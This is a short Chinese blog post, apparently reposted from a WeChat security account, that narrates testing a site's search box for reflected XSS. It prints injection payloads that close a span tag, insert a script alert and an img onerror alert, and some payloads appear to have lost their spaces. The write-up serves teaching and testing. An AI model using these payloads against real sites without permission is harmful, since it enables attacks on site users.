由于传播、利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人承担,Cyb3rES3c及文章作者不承担任何责任。如有侵权烦请告知,我们将立即删除相关内容并致歉。请遵守《中华人民共和国个人信息保护法》、《中华人民共和国网络安全法》等相关法律法规。
某网站 www.xxx.com 存在查询功能
有搜索框,检测是否存在 XSS,先输入一个字符串 66666 分析 HTML 结构
通过 F12 查看源代码发现查询关键字在 span标签中,接下来构造 Poc 闭合 span 标签验证是否能执行前端代码
</span><h1>666</h1><span>根据页面回显结果,可以确定成功闭合了 span 标签并让 h 标签生效
接下来构造弹窗 Poc
</span><script>alert(1)</script><span>
尝试使用 img 标签
</span><imgsrc=1onerror=1><span>出现图片logo,说明 img 标签没有被过滤
测试 alert() 函数是否被过滤
</span><imgsrc=1onerror=alert(6666)><span>出现弹窗,说明 alert() 函数没有被过滤
如果想要及时了解更多内容,请关注 Cyb3rES3c微信公众号!
原文始发于微信公众号(Cyb3rES3c):记一次XSS Bypass经历
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论